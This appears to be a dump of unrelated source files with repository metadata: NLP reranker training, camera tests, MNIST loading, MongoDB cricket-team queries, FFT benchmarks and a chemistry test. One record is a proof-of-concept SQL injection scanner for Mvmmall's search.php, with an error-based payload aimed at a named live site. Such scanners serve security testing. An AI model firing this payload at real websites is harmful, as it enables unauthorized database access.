for f in ynot[4].keys(): #orig float features
diff[f] = xcy[4][f] - ynot[4][f]
for i in range(5,len(xcy)):
if xcy[i] != ynot[i]:
diff[xcy[i]] = 1.0
diff[ynot[i]] = -1.0
m = max(0, (g-dot(diff, weights)))
return m
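# Worked hinge-loss example (numbers invented): with margin g = 0.25, if the
# reference candidate scores dot(f(x, y*), w) = 1.0 and a wrong candidate scores
# dot(f(x, y-), w) = 0.9, the score gap is 0.1 and L = max(0, 0.25 - 0.1) = 0.15,
# so the pair still violates the margin and updatew() applies a perceptron-style step.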
parser = argparse.ArgumentParser()
parser.add_argument('--input', '-i', default='data/dev+test.input')
parser.add_argument('--train','-tr',default='data/train.input')
parser.add_argument('--refs', '-r',default='data/train.refs')
parser.add_argument('--ttable', '-t', default='data/ttable')
parser.add_argument('--parses','-p',default='data/train.parses')
parser.add_argument('--devparses','-dp',default='data/dev+test.parses')
args = parser.parse_args()
#line.decode('utf-8').strip()
par= open(args.parses).read().split('\n\n')
parses =[]
for p in par: parses.append(p.split('\n'))
for p in range(len(parses)):
for l in range(len(parses[p])):
parses[p][l] = parses[p][l].decode('utf-8').strip()
dpar= open(args.devparses).read().split('\n\n')
dparses =[]
for dp in dpar: dparses.append(dp.split('\n'))
for dp in range(len(dparses)):
for dl in range(len(dparses[dp])):
dparses[dp][dl] = dparses[dp][dl].decode('utf-8').strip()
translation_table = read_ttable(args.ttable)
startweights = {'log_prob_tgs': 0.0,'log_prob_sgt': 0.0,'log_lex_prob_tgs':0.0,'log_lex_prob_sgt':0.0} #simple weight vector (1 0 0 0)
windptr = [0]
windices = []
wdata = []
wvocabulary = {}
ALLcsr = []
for f in startweights.keys():
windex = wvocabulary.setdefault(f,len(wvocabulary))
windices.append(windex)
wdata.append(startweights[f])
ix = []
indptr = [0]
indices = []
data = []
vocabulary = {}
for l, line in enumerate(open(args.train)):
left_context, phrase, right_context = [part.strip() for part in line.decode('utf-8').strip().split('|||')]
candidates = [(target,features) for target, features in translation_table[phrase].iteritems()]
xcynot = []
parse = parses[l]
lineOfPhrase = parse[len(left_context.split())]
dep = lineOfPhrase.split('\t')[-1]
parentIdx = int(lineOfPhrase.split('\t')[-2])-1
parentword = ''
if parentIdx == -1: parentword = 'ROOT'
else: parentword = parse[parentIdx].split('\t')[1]
POS = lineOfPhrase.split('\t')[3]
parentPOS = parse[parentIdx].split('\t')[3]
left_context = ('<s> '+left_context).strip()
right_context = (right_context + ' <\s>').strip()
left_word = left_context.split()[-1]
right_word = right_context.split()[0]
l2 = ''
if len(left_context.split()) > 1:
l2 = left_context.split()[-2]
n2 = ''
if len(right_context.split()) > 1:
n2 = right_context.split()[1]
for y,feat in candidates:
prev = 'src:'+phrase+'_tgt:'+y+'_prev:'+left_word
next = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word
parent = 'src:'+phrase+'_tgt:'+y+'_parent:'+parentword
deprole = 'src:'+phrase+'_tgt:'+y+'_dep:'+dep
suffix = y
if len(y) > 2: suffix = y[-2:]
POScase = 'POS:'+POS+'_case:'+suffix
DEPcase = 'DEP:'+dep+'_case:'+suffix
SUBJcase = 'SUBJ:'+parentword+'_case:'+suffix
Pcase = 'PREV:'+left_word+'_case:'+suffix
Ncase = 'NEXT:'+right_word+'_case:'+suffix
parPOS = 'parentPOS'+parentPOS+'_case'+y+suffix
prev2 = 'src:'+phrase+'_tgt:'+y+'_prev:'+l2+'_'+left_word
next2 = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word+'_'+n2
basic = 'src:'+phrase+'_tgt:'+y
parCase = 'parent'+parentword+'_case:'+suffix
windex = wvocabulary.setdefault(prev, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(next, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(parent, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(deprole, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(POScase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(DEPcase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(SUBJcase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(Pcase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(Ncase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(parPOS, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(prev2, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(next2, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(basic, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(parCase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windptr.append(len(windices))
#feats = csr_matrix((data,indices,indptr),dtype=float).toarray()
#print wvocabulary
#print feats
weights = csr_matrix((wdata,windices,windptr),dtype=float).toarray()
weights = weights[0]
vocabset = set()
for v in wvocabulary.keys():
vocabset.add(v)
sys.stderr.write('finished weight setup')
#print weights
#sys.stderr.write(str(len(feats[0]))+' '+str(len(weights[0]))+' '+str(len(ix)))
reffile = open(args.refs).readlines()
refs =[]
for r in reffile: refs.append(r.strip())
for iteration in range(3): #5->0.390308 #4-->0.39029
sys.stderr.write('starting iteration'+str(iteration+1)+'\n')
data = []
for l, line in enumerate(open(args.train)):
data.append((line + ' ||| '+refs[l]))
#random.shuffle(data)
for l, line in enumerate(data):
left_context, phrase, right_context,ref = [part.strip() for part in line.decode('utf-8').strip().split('|||')]
candidates = [(target,features) for target, features in sorted(translation_table[phrase].iteritems(), key=lambda (t, f): dot(f, weights), reverse=True)]
xcynot = []
parse = parses[l]
lineOfPhrase = parse[len(left_context.split())]
dep = lineOfPhrase.split('\t')[-1]
parentIdx = int(lineOfPhrase.split('\t')[-2])-1
parentword = ''
if parentIdx == -1: parentword = 'ROOT'
else: parentword = parse[parentIdx].split('\t')[1]
POS = lineOfPhrase.split('\t')[3]
parentPOS = parse[parentIdx].split('\t')[3]
n = 0
left_context = ('<s> '+left_context).strip()
right_context = (right_context + ' <\s>').strip()
left_word = left_context.split()[-1]
right_word = right_context.split()[0]
l2 = ''
if len(left_context.split()) > 1:
l2 = left_context.split()[-2]
n2 = ''
if len(right_context.split()) > 1:
n2 = right_context.split()[1]
for (y,origfeat) in candidates:
prev = 'src:'+phrase+'_tgt:'+y+'_prev:'+left_word
next = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word
parent = 'src:'+phrase+'_tgt:'+y+'_parent:'+parentword
deprole = 'src:'+phrase+'_tgt:'+y+'_dep:'+dep
suffix = y
if len(y) > 2: suffix = y[-2:]
POScase = 'POS:'+POS+'_case:'+suffix
DEPcase = 'DEP:'+dep+'_case:'+suffix
SUBJcase = 'SUBJ:'+parentword+'_case:'+suffix
Pcase = 'PREV:'+left_word+'_case:'+suffix
Ncase = 'NEXT:'+right_word+'_case:'+suffix
parPOS = 'parentPOS'+parentPOS+'_case'+y+suffix
prev2 = 'src:'+phrase+'_tgt:'+y+'_prev:'+l2+'_'+left_word
next2 = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word+'_'+n2
basic = 'src:'+phrase+'_tgt:'+y
parCase = 'parent'+parentword+'_case:'+suffix
if y == ref:
xcy = (phrase, prev, next, y, origfeat, parent, deprole, POScase, DEPcase, SUBJcase, Pcase, Ncase, parPOS, prev2 ,next2, basic, parCase)
# xcy = (phrase,prev,next,y,origfeat,0,0,0,0,0,0,0)
else:
xcynot.append((phrase, prev, next, y, origfeat, parent, deprole, POScase, DEPcase, SUBJcase, Pcase, Ncase, parPOS, prev2, next2, basic, parCase))
#xcynot.append((phrase,prev,next,y,origfeat,0,0,0,0,0,0,0))
#incorrect
for ynot in xcynot:
if L(xcy,ynot,0.25) != 0: #float is gamma
weights = updatew(weights,xcy,ynot)
sys.stderr.write('finished training')
for l,line in enumerate(open(args.input)):
left_context, phrase, right_context = [part.strip() for part in line.decode('utf-8').strip().split('|||')]
candidates = [(target,features) for target, features in sorted(translation_table[phrase].iteritems(), key=lambda (t, f): dot(f, weights), reverse=True)]
c2 = []
parse = dparses[l]
lineOfPhrase = parse[len(left_context.split())]
dep = lineOfPhrase.split('\t')[-1]
parentIdx = int(lineOfPhrase.split('\t')[-2])-1
parentword = ''
if parentIdx == -1: parentword = 'ROOT'
else: parentword = parse[parentIdx].split('\t')[1]
POS = lineOfPhrase.split('\t')[3]
parentPOS = parse[parentIdx].split('\t')[3]
left_context = ('<s> '+left_context).strip()
right_context = (right_context + ' <\s>').strip()
left_word = left_context.split()[-1]
right_word = right_context.split()[0]
l2 = ''
if len(left_context.split()) > 1:
l2 = left_context.split()[-2]
n2 = ''
if len(right_context.split()) > 1:
n2 = right_context.split()[1]
for (y,feat) in candidates:
prev = 'src:'+phrase+'_tgt:'+y+'_prev:'+left_word # use the adjacent word, matching the training-time features
next = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word
parent = 'src:'+phrase+'_tgt:'+y+'_parent:'+parentword
deprole = 'src:'+phrase+'_tgt:'+y+'_dep:'+dep
suffix = y
if len(y) > 2: suffix = y[-2:]
POScase = 'POS:'+POS+'_case:'+suffix
DEPcase = 'DEP:'+dep+'_case:'+suffix
SUBJcase = 'SUBJ:'+parentword+'_case:'+suffix
Pcase = 'PREV:'+left_word+'_case:'+suffix
Ncase = 'NEXT:'+right_word+'_case:'+suffix
parPOS = 'parentPOS'+parentPOS+'_case'+y+suffix
prev2 = 'src:'+phrase+'_tgt:'+y+'_prev:'+l2+'_'+left_word
next2 = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word+'_'+n2
basic = 'src:'+phrase+'_tgt:'+y
parCase = 'parent'+parentword+'_case:'+suffix
if prev in vocabset: feat[prev] = 1.0
if next in vocabset: feat[next] = 1.0
if parent in vocabset: feat[parent] = 1.0
if deprole in vocabset: feat[deprole] = 1.0
if POScase in vocabset: feat[POScase] = 1.0
if DEPcase in vocabset: feat[DEPcase] = 1.0
if SUBJcase in vocabset: feat[SUBJcase] = 1.0
if Pcase in vocabset: feat[Pcase] = 1.0
if Ncase in vocabset: feat[Ncase] = 1.0
if parPOS in vocabset: feat[parPOS] = 1.0
if prev2 in vocabset: feat[prev2] = 1.0
if next2 in vocabset: feat[next2] = 1.0
if basic in vocabset: feat[basic] = 1.0
if parCase in vocabset: feat[parCase] = 1.0
#sys.stderr.write('using dep feature...')
#sys.stderr.write(str(dot(feat,weights))+'\t')
c2.append((y,dot(feat,weights)))
c3 = sorted(c2, key=lambda x: x[1], reverse=True)
cfinal = []
for i in range(len(c3)):
cfinal.append(c3[i][0])
print ' ||| '.join(cfinal).encode('utf-8')
sys.stderr.write('.')
#sys.stderr.write(' ||| '.join(candidates).encode('utf-8'))
| [
"[email protected]"
] | ||
7a585f12998db78082bbf1742eaaebe96554b0df | 54a6a6c07276cdb6436d833243e3a15d6742cfe5 | /test/test_loop_snap_stop.py | 1cee41b933b33232cc7c1c6a13c1f49623651a8b | [] | no_license | soleil-ica/Lima-camera-imxpad | 6e17028dbe18a382c4e084426230da04bba127b0 | cf1767b9058f43cc44f807c65c4b5e8876b27d60 | refs/heads/master | 2023-08-29T09:48:43.274381 | 2023-02-15T18:00:28 | 2023-02-17T14:58:09 | 61,614,724 | 0 | 4 | null | 2022-05-23T16:05:21 | 2016-06-21T08:05:19 | C++ | UTF-8 | Python | false | false | 4,351 | py | #!/usr/bin/env python
#########################################################
#Arafat NOUREDDINE
#2014/11/19
#Purpose : Test LimaDetector state
#########################################################
import os
import sys
import PyTango
import time
import datetime
proxy = ''
#------------------------------------------------------------------------------
# build exception
#------------------------------------------------------------------------------
class BuildError(Exception):
pass
#------------------------------------------------------------------------------
# Colors
#------------------------------------------------------------------------------
class bcolors:
PINK = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
UNDERLINE = '\033[4m'
def disable(self):
self.PINK = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.FAIL = ''
self.ENDC = ''
self.UNDERLINE = ''
#------------------------------------------------------------------------------
def snap(proxy, integration, latency, stop_after):
print '\nSnap() \n------------------'
#Configure the device
#Display time when state is STANDBY (just before Snap())
timeBegin = datetime.datetime.now()
print timeBegin.isoformat(), ' - ', proxy.state()
proxy.exposureTime = integration
proxy.latencyTime = latency
proxy.Snap()
#Display time when state is RUNNING (just after Snap())
timeSnap = datetime.datetime.now()
print timeSnap.isoformat(), ' - ', proxy.state()
time.sleep(stop_after/1000)
#force a Stop() after the stop_after delay
proxy.Stop()
#Display time when state is STANDBY (just after the acquisition has finished)
timeEnd = datetime.datetime.now()
print '\n', timeEnd.isoformat(), ' - ', proxy.state()
print '\nDuration = ', ((timeEnd-timeSnap).total_seconds()*1000),'(ms)'
time.sleep(latency)
return
#return proxy.image
#------------------------------------------------------------------------------
# Usage
#------------------------------------------------------------------------------
def usage():
print "Usage: [python] test_loop_snap_stop.py <my/device/proxy> <integration time in ms> <latency in ms> <stop_after in ms> <nb_loops>"
sys.exit(1)
#------------------------------------------------------------------------------
# run
#------------------------------------------------------------------------------
def run(proxy_name = 'test/lima/imxpad.1', integration = 5000, latency = 0, stop_after = 2000 , nb_loops = 100000):
# print arguments
print '\nProgram inputs :\n--------------'
print 'proxy_name\t = ', proxy_name
print 'integration\t = ', integration
print 'latency\t = ', latency
print 'stop_after\t = ', stop_after
print 'nb_loops\t = ', nb_loops
proxy = PyTango.DeviceProxy(proxy_name)
#Configure the device
print '\nConfigure Device attributes :\n--------------'
proxy.Stop()
nb_loops = int(nb_loops)
integration = float(integration)
latency = float(latency)
stop_after = float(stop_after)
alias = '1'
print '\n'
try:
current_loop = 0
while(current_loop<nb_loops):
print '\n========================================================'
print '\t' + bcolors.PINK + 'Loop : ', current_loop, bcolors.ENDC,
print '\n========================================================'
snap(proxy, integration, latency, stop_after)
current_loop=current_loop+1
state = proxy.state()
if (state!=PyTango.DevState.STANDBY):
# raise Exception('FAIL : Acquisition is end with state (%s)' %(state))
print bcolors.RED + 'FAIL : device did not return to STANDBY (state: %s) !' % state, bcolors.ENDC,
print '\noutput :\n--------------'
print '\nProgram outputs :\n--------------'
except Exception as err:
sys.stderr.write('--------------\nERROR :\n--------------\n%s\n' %err)
#------------------------------------------------------------------------------
# Main Entry point
#------------------------------------------------------------------------------
if __name__ == "__main__":
# if len(sys.argv) < 4:
# usage()
run(*sys.argv[1:])
| [
"[email protected]"
] | |
a3a5d94d9d641fb85d1031115f2381f650289f28 | 46cb587e5473e6bb47878ebbaaf8fa76fcd97f89 | /09-NeuralNetwork/20181028/mnist_loader.py | 3fa24e108f8d4a4f8d6582b88155ce0ab44d70af | [] | no_license | AaronFlower/Jupyter | d342a3decb050985b4f4dcad4a0c1fd05a771f76 | 3fd252c10399e9057ba9a23e75651875ab6d89f2 | refs/heads/master | 2023-08-09T07:27:27.432826 | 2023-07-12T08:09:12 | 2023-07-12T08:09:12 | 84,337,325 | 1 | 1 | null | 2017-03-22T16:11:52 | 2017-03-08T15:42:13 | Jupyter Notebook | UTF-8 | Python | false | false | 1,089 | py | # -*- coding: utf-8 -*-
import gzip
import pickle
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
def load_data():
f = gzip.open('../mnist.pkl.gz', 'rb')
train, val, test = pickle.load(f, encoding='bytes')
f.close()
return train, val, test
def load_data_wrapper():
train, val, test = load_data()
train_X = [x.reshape(-1, 1) for x in train[0]]
train_y = [vectorize(y) for y in train[1]]
val_X = [x.reshape(-1, 1) for x in val[0]]
test_X = [x.reshape(-1, 1) for x in test[0]]
return (
list(zip(train_X, train_y)),
list(zip(val_X, val[1])),
list(zip(test_X, test[1]))
)
def vectorize(i):
y = np.zeros((10, 1))
y[i] = 1
return y
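# e.g. vectorize(2) returns a (10, 1) one-hot column:
# array([[0.], [0.], [1.], [0.], [0.], [0.], [0.], [0.], [0.], [0.]])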
def plot_images6(data):
ilist = np.random.permutation(len(data))
fig = plt.figure()
for i in range(1, 7):
X, _ = data[ilist[i]]
image = X.reshape(28, 28)
ax = fig.add_subplot(1, 6, i)
ax.matshow(image, cmap=matplotlib.cm.binary)
plt.xticks(np.array([]))
plt.yticks(np.array([]))
plt.show()
| [
"[email protected]"
] | |
0c448d5d9533485b666d5f11510eb4bdf0e13294 | 9fa07ba96a5330712bb1f1d0874375e6f4923ce7 | /wait/www/387.py | 3d6ab8263419dea2fd32e7413af8f4570a1f4842 | [] | no_license | Ajatars/Ajatar | cf4460d881b18095ce968c883e68500d44f90570 | 943b71285e6b74ae38861aa305d26b0a9bef4050 | refs/heads/master | 2020-06-02T02:14:05.989075 | 2019-06-10T02:48:10 | 2019-06-10T02:48:10 | 191,002,958 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : Mvmmall search.php SQL Injection
Reference : http://www.wooyun.org/bugs/wooyun-2011-01732
Author : NoName
"""
import re
from urllib.parse import urlparse
def assign(service, arg):
if service == "www":
r = urlparse(arg)
return True, '%s://%s/' % (r.scheme, r.netloc)
def audit(arg):
payload = "search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20md5(12345))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23"
code, head, res, errcode, _ = curl.curl(arg + payload)
if code == 200:
m = re.search("827ccb0eea8a706c4c34a16891f84e7b1",res)
if m:
security_hole('Mvmmall search.php SQL Injection exists.')
if __name__ == '__main__':
from dummy import *
audit(assign('www', 'http://dajiamai.com/')[1]) | [
"[email protected]"
] | |
8ffe39ec8cedaeb1bdc48e7cdab9d9db8a9f34ba | 30013757093b79e83211fae3f6e2929d402c49e2 | /tpred/mine_twitter_by_followers.py | 13af02cd5b3d2b4a132a1d510a3682536fdebf06 | [] | no_license | schetudiante/tpred | 01031252046b566714878c3af7d870b4cec1b1e7 | 773d70d81d4e1478d641bd5f5f7ee3f4b6250bd8 | refs/heads/master | 2021-05-30T19:56:04.196543 | 2015-12-23T23:59:36 | 2015-12-23T23:59:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | import t
import tweet_mine
res = t.api.friends.ids(screen_name='amirpc')['ids']
ids = [str(twid) for twid in res]
it = t.stream.statuses.filter(follow=",".join(ids))
tweet_mine.mine(it)
| [
"[email protected]"
] | |
a0fde5ce97072b01e205d1e9ff8227da865e77ae | 44d277aef0a9b2a8a4d2b8bd20e6402fab13f9f4 | /Fantasy CricketTeam Prediction/WebApp/dbms/new/database.py | 57d980b2785e184c42ad0026d48e920520406e35 | [] | no_license | pikachua7/Fantasy-Cricket-Team-Prediction | d6eeb8c8a9bff0a8d480e9f6b2b877075f78c6ae | d991264a4d3f8f33e106e5a43b55f853018af51d | refs/heads/master | 2023-01-05T14:12:56.440338 | 2020-11-07T17:38:28 | 2020-11-07T17:38:28 | 310,897,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,841 | py | import pymongo
# from new.views import team
# teams=team
myc=pymongo.MongoClient('mongodb://localhost:27017/')
mydb=myc['ipl']
class batsman_gen:
batsman=mydb['batsman']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.batsman.find({'$or':[query1,query2]},{'_id':0,'Player':1}).sort('Player')
for x in selected:
array.append(x.get('Player'))
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.batsman.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Batting_Parameter',-1)
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
class bowler_gen:
bowler=mydb['bowler']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.bowler.find({'$or':[query1,query2]},{'_id':0,'Player':1}).sort('Player')
for x in selected:
array.append(x.get('Player'))
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.bowler.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Bowling_Parameter')
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
class allrounder_gen:
allrounder=mydb['allrounder']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.allrounder.find({'$or':[query1,query2]},{'_id':0,'Player':1}).sort('Player')
for x in selected:
array.append(x.get('Player'))
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
            # also project the Allrounder_Parameter the query sorts on
            selected=self.allrounder.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Allrounder_Parameter':1,'Team':1}).sort('Allrounder_Parameter',-1)
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
class keeper_gen:
keeper=mydb['keeper']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.keeper.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Player')
for x in selected:
array.append(x['Player'])
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.keeper.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Batting_Parameter',-1)
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
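
# Minimal usage sketch (assumes the local MongoDB above is populated; the team
# names are placeholders, not values taken from this file):
#
#   gen = batsman_gen()
#   names = gen.generate(['CSK', 'MI'])     # player names from both teams, alphabetical
#   ranked = gen.mygenerate(['CSK', 'MI'])  # docs sorted by Batting_Parameter, descending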
| [
"[email protected]"
] | |
4bb8afa90a9835e931209b939aa2803521958601 | 2ee49dc0b16ddfd61bf4b2453edc7f733101a7fd | /bench_pyfftw_thread_4.py | d57613b2979e1a1f6f798571a1c6955caf1df2a8 | [
"MIT"
] | permissive | zhouxzh/Jetson_nano_stft_benchmark | 1e004f7fc53ff2ba1cfba60e9e00a559bd49e298 | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | refs/heads/master | 2020-05-19T02:25:37.344384 | 2019-05-03T16:04:06 | 2019-05-03T16:04:06 | 184,780,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,541 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Computes the spectrogram of a test signal using numpy and fftw.
Author: Jan Schlüter
"""
import sys
import os
import timeit
import numpy as np
from pyfftw.builders import rfft as rfft_builder
from testfile import make_test_signal
INPUT_AS_FLOAT = False
def spectrogram(samples, sample_rate=22050, frame_len=1024, fps=70, batch=50):
"""
Computes a magnitude spectrogram for a given vector of samples at a given
sample rate (in Hz), frame length (in samples) and frame rate (in Hz).
Allows to transform multiple frames at once for improved performance (with
a default value of 50, more is not always better). Returns a numpy array.
"""
if len(samples) < frame_len:
return np.empty((0, frame_len // 2 + 1), dtype=samples.dtype)
win = np.hanning(frame_len).astype(samples.dtype)
hopsize = sample_rate // fps
num_frames = max(0, (len(samples) - frame_len) // hopsize + 1)
batch = min(batch, num_frames)
if batch <= 1 or not samples.flags.c_contiguous:
rfft = rfft_builder(samples[:frame_len], n=frame_len, threads=4)
        # np.vstack needs a real sequence; newer NumPy versions reject bare generators
        spect = np.vstack([np.abs(rfft(samples[pos:pos + frame_len] * win))
                           for pos in range(0, len(samples) - frame_len + 1,
                                            int(hopsize))])
else:
rfft = rfft_builder(np.empty((batch, frame_len), samples.dtype),
n=frame_len, threads=4)
frames = np.lib.stride_tricks.as_strided(
samples, shape=(num_frames, frame_len),
strides=(samples.strides[0] * hopsize, samples.strides[0]))
spect = [np.abs(rfft(frames[pos:pos + batch] * win))
for pos in range(0, num_frames - batch + 1, batch)]
if num_frames % batch:
spect.append(spectrogram(
samples[(num_frames // batch * batch) * hopsize:],
sample_rate, frame_len, fps, batch=1))
spect = np.vstack(spect)
return spect
def main():
# load input
global x
x = make_test_signal()
if INPUT_AS_FLOAT:
x = x.astype(np.float32)
# benchmark
times = timeit.repeat(
setup='from __main__ import x, spectrogram, np',
stmt='spectrogram(np.asarray(x, np.float32))',
repeat=5, number=32)
print("Took %.3fs." % (min(times) / 32))
# save result
#np.save(sys.argv[0][:-2] + 'npy', spectrogram(x.astype(np.float32)))
if __name__=="__main__":
main()
| [
"[email protected]"
] | |
5ae031aeb99d729fe90dc2b53d1bb9e39586fc7e | ed273db8304adf27b9117817b7d4376ffef6f375 | /Carta.py | 79c61ecaa0c38454a082b6a89ad021f634094efb | [] | no_license | mamerida/python-poo-curse | 282a4cbe6704d18f7f59799354135bc1bc6d7ce5 | b99d1736ac77eed3dbc0371ddbefcd148e85f4db | refs/heads/master | 2023-07-13T05:35:40.103830 | 2021-08-23T15:46:50 | 2021-08-23T15:46:50 | 367,674,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 539 | py | class Carta:
def __init__(self, numero, palo ):
self.palo = palo
self.numero = numero
    def convertir_numero_a_letra(self):
        # Map face cards to letters (11 -> J, 12 -> Q, 13 -> K, 1 -> As);
        # any other value is returned as its decimal string.
        valor=""
if (self.numero == 11):
valor ="J"
elif (self.numero == 12):
valor ="Q"
elif (self.numero == 13):
valor ="K"
elif (self.numero == 1):
valor = "As"
else:
valor = str(self.numero)
return valor
def imprimir(self):
numero = self.convertir_numero_a_letra()
print(numero ," de ",self.palo)
    def obtener_numero(self):
        # Face cards (J/Q/K) count as 10, blackjack-style.
        return 10 if self.numero > 10 else self.numero
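
# Minimal usage sketch (the suit string is an arbitrary example value):
#
#   carta = Carta(12, "corazones")
#   carta.imprimir()                # prints: Q  de  corazones
#   print(carta.obtener_numero())   # prints: 10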
| [
"[email protected]"
] | |
619dff3fc4f5f34f2ea4f843e80b2f4d472b30d0 | b6bcfd935f7876fc65416e7340fda1c9b0516fd7 | /pyscf/tdscf/test/test_tduks.py | 091c6b43834c92a378e73acb5b9bd073aa22e37b | [
"Apache-2.0"
] | permissive | lzypotato/pyscf | 62f849b9a3ec8480c3da63a5822ea780608796b2 | 94c21e2e9745800c7efc7256de0d628fc60afc36 | refs/heads/master | 2020-09-06T22:45:04.191935 | 2019-06-18T06:04:48 | 2019-06-18T06:04:48 | 220,578,540 | 1 | 0 | Apache-2.0 | 2019-11-09T02:13:16 | 2019-11-09T02:13:15 | null | UTF-8 | Python | false | false | 13,906 | py | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <[email protected]>
#
import unittest
import numpy
import copy
from pyscf import lib, gto, scf, dft
from pyscf import tdscf
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = [
["O" , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)] ]
mol.spin = 2
mol.basis = '631g'
mol.build()
mf = scf.UHF(mol).run()
td_hf = tdscf.TDHF(mf).run(conv_tol=1e-12)
mf_lda = dft.UKS(mol).set(xc='lda', conv_tol=1e-12)
mf_lda.grids.prune = None
mf_lda = mf_lda.newton().run()
mf_bp86 = dft.UKS(mol).set(xc='b88,p86', conv_tol=1e-12)
mf_bp86.grids.prune = None
mf_bp86 = mf_bp86.newton().run()
mf_b3lyp = dft.UKS(mol).set(xc='b3lyp', conv_tol=1e-12)
mf_b3lyp.grids.prune = None
mf_b3lyp = mf_b3lyp.newton().run()
def diagonalize(a, b, nroots=4):
a_aa, a_ab, a_bb = a
b_aa, b_ab, b_bb = b
nocc_a, nvir_a, nocc_b, nvir_b = a_ab.shape
a_aa = a_aa.reshape((nocc_a*nvir_a,nocc_a*nvir_a))
a_ab = a_ab.reshape((nocc_a*nvir_a,nocc_b*nvir_b))
a_bb = a_bb.reshape((nocc_b*nvir_b,nocc_b*nvir_b))
b_aa = b_aa.reshape((nocc_a*nvir_a,nocc_a*nvir_a))
b_ab = b_ab.reshape((nocc_a*nvir_a,nocc_b*nvir_b))
b_bb = b_bb.reshape((nocc_b*nvir_b,nocc_b*nvir_b))
a = numpy.bmat([[ a_aa , a_ab],
[ a_ab.T, a_bb]])
b = numpy.bmat([[ b_aa , b_ab],
[ b_ab.T, b_bb]])
e = numpy.linalg.eig(numpy.bmat([[a , b ],
[-b.conj(),-a.conj()]]))[0]
lowest_e = numpy.sort(e[e.real > 0].real)[:nroots]
lowest_e = lowest_e[lowest_e > 1e-3]
return lowest_e
def tearDownModule():
global mol, mf, td_hf, mf_lda, mf_bp86, mf_b3lyp
mol.stdout.close()
del mol, mf, td_hf, mf_lda, mf_bp86, mf_b3lyp
class KnownValues(unittest.TestCase):
def test_nohbrid_lda(self):
